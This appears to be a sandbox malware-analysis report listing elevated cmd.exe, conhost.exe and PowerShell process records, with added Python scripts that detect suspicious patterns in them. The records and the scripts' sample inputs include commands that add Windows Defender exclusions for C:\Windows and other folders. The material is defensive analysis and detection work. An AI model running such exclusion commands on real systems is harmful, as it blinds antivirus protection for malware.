                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

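Two of the records above are the ones worth turning into detection logic: Target ID 182 adds the user's Temp folder to the Windows Defender exclusion list with Add-MpPreference -ExclusionPath, and Target ID 173 runs choice /C Y /N /D Y /T 3, which is not a prompt but a three-second timer that auto-selects Y. The following is an added example written for this page, not code from Joe Sandbox or from the analysed sample: a small scanner over process-creation records that flags both patterns and, going beyond what this report shows, also unpacks the -EncodedCommand (base64 UTF-16LE) form of the same cmdlet. The ProcEvent records are constructed here to mirror Target IDs 173 and 182 (parent/child links are not in this section and are omitted); the records with pids 900-902, the USER_WRITABLE list and all function names are assumptions for illustration.

```python
import base64
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import List, Optional


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record: pid, image path, command line (constructed input)."""
    pid: int
    image: str
    command_line: str


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


# Directories a non-admin user can write to (assumed list). An exclusion covering one
# of them blinds Defender to whatever is dropped there next, so it is rated "high".
USER_WRITABLE = (
    r"\appdata\local\temp", r"\appdata\roaming", r"\programdata",
    r"\users\public", r"\windows\temp",
)

# Add-/Set-MpPreference followed by an -Exclusion* parameter; captures its argument.
MP_EXCLUSION_RE = re.compile(
    r"""\b(?:add|set)-mppreference\b[^|;]*?-exclusion(?:path|extension|process)\s+"""
    r"""(?P<value>'[^']*'|"[^"]*"|\S+)""",
    re.IGNORECASE,
)
# powershell -e / -ec / -enc / -EncodedCommand <base64>
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# choice.exe /T <seconds> combined with /D <default> never waits for a user.
CHOICE_TIMEOUT_RE = re.compile(r"/t\s*(\d+)", re.IGNORECASE)
CHOICE_DEFAULT_RE = re.compile(r"/d\s*\S", re.IGNORECASE)


def encode_command(script: str) -> str:
    """Build the base64-of-UTF-16LE string that PowerShell's -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str) -> str:
    """Return the decoded -EncodedCommand payload, or '' if absent or not decodable."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def _basename(image: str) -> str:
    return PureWindowsPath(image).name.lower()


def check_defender_exclusion(ev: ProcEvent) -> Optional[Finding]:
    """Flag Add-/Set-MpPreference -Exclusion* on the literal or the decoded command line."""
    if _basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return None
    for text in (ev.command_line, decode_encoded_command(ev.command_line)):
        m = MP_EXCLUSION_RE.search(text)
        if m:
            value = m.group("value").strip("'\"")
            severity = "high" if any(p in value.lower() for p in USER_WRITABLE) else "medium"
            return Finding(ev.pid, "defender_exclusion_added", f"{severity}: {value}")
    return None


def check_choice_timer(ev: ProcEvent) -> Optional[Finding]:
    """Flag choice.exe /D <default> /T <seconds>: a sleep primitive, not an interactive prompt."""
    if _basename(ev.image) != "choice.exe":
        return None
    t = CHOICE_TIMEOUT_RE.search(ev.command_line)
    if t and CHOICE_DEFAULT_RE.search(ev.command_line):
        return Finding(ev.pid, "choice_used_as_timer", f"waits {t.group(1)} s, then takes the default")
    return None


CHECKS = (check_defender_exclusion, check_choice_timer)


def scan(events: List[ProcEvent]) -> List[Finding]:
    """Run every check over every record and collect the findings."""
    findings: List[Finding] = []
    for ev in events:
        for check in CHECKS:
            f = check(ev)
            if f is not None:
                findings.append(f)
    return findings


# Constructed records: 173 and 182 mirror the report; 900-902 are made up for the example.
SAMPLE_EVENTS = [
    ProcEvent(173, r"C:\Windows\System32\choice.exe", "choice /C Y /N /D Y /T 3"),
    ProcEvent(182, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'"),
    ProcEvent(900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -nop -w hidden -enc " + encode_command(r"Add-MpPreference -ExclusionPath 'C:\ProgramData\svc'")),
    ProcEvent(901, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -Command Get-MpPreference"),
    ProcEvent(902, r"C:\Windows\System32\conhost.exe", "conhost.exe 0xffffffff -ForceV1"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid={f.pid} {f.rule}: {f.detail}")
```

The exclusion check is the one to alert on: read-only cmdlets such as Get-MpPreference do not match, and the rating is driven by where the excluded path points rather than by the cmdlet alone. The choice timer on its own is weak evidence and is better used as context for the cmd.exe /c chain it belongs to than as a stand-alone alert.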
Target ID: 183
Start time: 11:42:58
Start date: 27/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c
Imagebase: 0x7ff7067d0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 184
Start time: 11:42:58
Start date: 27/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 185
Start time: 11:42:58
Start date: 27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:186
                                                                                                                                                                Start time:11:42:58
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:187
                                                                                                                                                                Start time:11:43:00
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:188
                                                                                                                                                                Start time:11:43:00
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:189
                                                                                                                                                                Start time:11:43:00
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:190
                                                                                                                                                                Start time:11:43:00
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:191
                                                                                                                                                                Start time:11:43:00
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:192
                                                                                                                                                                Start time:11:43:01
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:193
                                                                                                                                                                Start time:11:43:01
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:194
                                                                                                                                                                Start time:11:43:01
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:195
                                                                                                                                                                Start time:11:43:01
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:196
                                                                                                                                                                Start time:11:43:02
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:197
                                                                                                                                                                Start time:11:43:02
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:198
                                                                                                                                                                Start time:11:43:02
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:199
                                                                                                                                                                Start time:11:43:03
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:200
                                                                                                                                                                Start time:11:43:04
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:201
                                                                                                                                                                Start time:11:43:04
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:202
                                                                                                                                                                Start time:11:43:05
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:203
                                                                                                                                                                Start time:11:43:05
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:204
                                                                                                                                                                Start time:11:43:07
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:205
                                                                                                                                                                Start time:11:43:07
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:206
                                                                                                                                                                Start time:11:43:08
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:207
                                                                                                                                                                Start time:11:43:08
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:false
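
The process entries above (Target IDs 197 to 207) show one pattern worth triaging by script rather than by eye: the same cmd.exe binary, one MD5 across every entry, started with elevated privileges five times in six seconds, each start paired with a conhost.exe helper, and nothing shown after `/c` on the command line. The following Python is an added example and not part of the Joe Sandbox report: it parses the report's key:value process blocks (tolerating the empty Wow64 and Imagebase fields of a process that had not exited at snapshot time, such as Target ID 207), checks that each path is backed by a single hash, and flags elevated spawn bursts of one binary. The sample input is transcribed from four of the entries above with some fields omitted; the burst thresholds are assumptions.

```python
"""Parse Joe Sandbox process entries and flag repeated elevated spawns of one binary.
Added example, not part of the report. SAMPLE is transcribed from entries 197, 200,
202 and 207 above (a subset of fields); 207 keeps its empty Wow64 field as shown."""
from collections import defaultdict
from datetime import datetime

SAMPLE = r'''
Target ID:197
Start time:11:43:02
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has exited:true

Target ID:200
Start time:11:43:04
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has exited:true

Target ID:202
Start time:11:43:05
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has exited:true

Target ID:207
Start time:11:43:08
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has exited:false
'''

def _flag(value):
    """Report booleans are the strings true/false; an empty field (still-running process) stays None."""
    return None if value == "" else value.lower() == "true"

def parse_processes(text):
    """One record per blank-line-separated block; each line splits at its first colon only."""
    records = []
    for block in text.strip().split("\n\n"):
        raw = {k.strip(): v.strip() for k, sep, v in (ln.partition(":") for ln in block.splitlines()) if sep}
        records.append({
            "id": int(raw["Target ID"]),
            "start": datetime.strptime(raw["Start date"] + " " + raw["Start time"], "%d/%m/%Y %H:%M:%S"),
            "path": raw["Path"],
            "cmdline": raw["Commandline"],
            "md5": raw["MD5 hash"].lower(),
            "size": int(raw["File size"].replace("'", "").replace(" bytes", "")),  # 289'792 bytes -> 289792
            "wow64": _flag(raw["Wow64 process (32bit)"]),
            "elevated": _flag(raw["Has elevated privileges"]),
            "exited": _flag(raw["Has exited"]),
        })
    return records

def hash_conflicts(records):
    """Paths seen with more than one MD5: the same file name backed by different binaries."""
    seen = defaultdict(set)
    for r in records:
        seen[r["path"]].add(r["md5"])
    return {p: sorted(h) for p, h in seen.items() if len(h) > 1}

def spawn_bursts(records, min_count=3, window_seconds=10):
    """Binaries (path+md5) started elevated at least min_count times within window_seconds.
    Both thresholds are assumptions for this example, not values from the report."""
    groups = defaultdict(list)
    for r in sorted(records, key=lambda r: r["start"]):
        if r["elevated"]:
            groups[(r["path"], r["md5"])].append(r)
    hits = []
    for (path, md5), rs in groups.items():
        for i, first in enumerate(rs):
            run = [r for r in rs[i:] if (r["start"] - first["start"]).total_seconds() <= window_seconds]
            if len(run) >= min_count:
                hits.append({"path": path, "md5": md5, "ids": [r["id"] for r in run]})
                break
    return hits
```

Run against the sample, `hash_conflicts` returns an empty dict (every cmd.exe entry carries 8A2122E8..., every conhost.exe entry 0D698AF3...), and `spawn_bursts` returns one hit for cmd.exe with IDs 197, 200 and 202. The heuristic keys on path, hash and timing rather than on the command line, because the report shows nothing after `/c`; a full triage would still pull the dropped files and the command lines from the behaviour graph to see what each cmd.exe actually ran.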

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1764546782.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4cc0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: df65267b06524cad8b6a782c3d857d1eee2ca08c33ba89bd2a78c3111470eeea
                                                                                                                                                                  • Instruction ID: b8d3b94817982129c8e08bcf05855971433419542d61ec2ac049d1d1e1eb83f3
                                                                                                                                                                  • Opcode Fuzzy Hash: df65267b06524cad8b6a782c3d857d1eee2ca08c33ba89bd2a78c3111470eeea
                                                                                                                                                                  • Instruction Fuzzy Hash: FFF090A730C010FD7040D1C32624BB667AFE2C5730328882FF14BD6501F1546A847232
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1764546782.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4cc0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 907eafe6881db90bac7e00afa1bffebf17cba2c00706839912d55e50caecffe7
                                                                                                                                                                  • Instruction ID: 49030dfa4bca07bec39b963adf8bb9061815e88708a098e4b5cb75947fb34ab5
                                                                                                                                                                  • Opcode Fuzzy Hash: 907eafe6881db90bac7e00afa1bffebf17cba2c00706839912d55e50caecffe7
                                                                                                                                                                  • Instruction Fuzzy Hash: D9D097A2A0C120CC82028CF3801C2392FE6F64122030688BFC0C2CE4A3F114E846E3E1
Memory Dump Source
• Source File: 00000000.00000002.1764546782.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4cc0000_file.jbxd

Execution Graph

Execution Coverage: 10.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 4.8%
Total number of Nodes: 1779
Total number of Limit Nodes: 40
15589 c277d3 shared_ptr 15586->15589 15587 c37870 RtlAllocateHeap 15588 c27831 15587->15588 15590 c37870 RtlAllocateHeap 15588->15590 15589->15587 15595 c27876 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 15589->15595 15591 c2784c 15590->15591 15592 c25b20 RtlAllocateHeap 15591->15592 15593 c27853 15592->15593 15594 c37f30 RtlAllocateHeap 15593->15594 15594->15595 15597 c38610 15596->15597 15597->15597 15598 c375d0 RtlAllocateHeap 15597->15598 15599 c38629 15598->15599 15600 c38e70 RtlAllocateHeap 15599->15600 15601 c38644 15599->15601 15600->15601 15602 c38e70 RtlAllocateHeap 15601->15602 15604 c38699 15601->15604 15603 c386e1 15602->15603 15603->15585 15604->15585 14129 c36ae0 14132 c36b10 14129->14132 14130 c37870 RtlAllocateHeap 14130->14132 14131 c25b20 RtlAllocateHeap 14131->14132 14132->14130 14132->14131 14135 c346c0 14132->14135 14134 c36b5c Sleep 14134->14132 14136 c346fb 14135->14136 14247 c34d80 shared_ptr 14135->14247 14138 c37870 RtlAllocateHeap 14136->14138 14136->14247 14137 c34e69 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14137->14134 14139 c3471c 14138->14139 14402 c25b20 14139->14402 14141 c34723 14143 c37870 RtlAllocateHeap 14141->14143 14145 c34735 14143->14145 14144 c34f25 14770 c26920 14144->14770 14147 c37870 RtlAllocateHeap 14145->14147 14148 c34747 14147->14148 14409 c2bd60 14148->14409 14150 c34753 14152 c37870 RtlAllocateHeap 14150->14152 14151 c34fee shared_ptr 14780 c27d00 14151->14780 14155 c34768 14152->14155 14154 c34f35 shared_ptr 14154->14151 14178 c36ab6 14154->14178 14157 c37870 RtlAllocateHeap 14155->14157 14156 c34ffd 14853 c24570 14156->14853 14159 c34780 14157->14159 14161 c25b20 RtlAllocateHeap 14159->14161 14160 c3500a 14857 c282b0 14160->14857 14164 c34787 14161->14164 14163 c35016 14165 c24570 RtlAllocateHeap 14163->14165 14433 c284b0 14164->14433 14167 c35023 14165->14167 14173 c24570 RtlAllocateHeap 14167->14173 14168 c34793 14170 c34a19 14168->14170 14171 c37870 
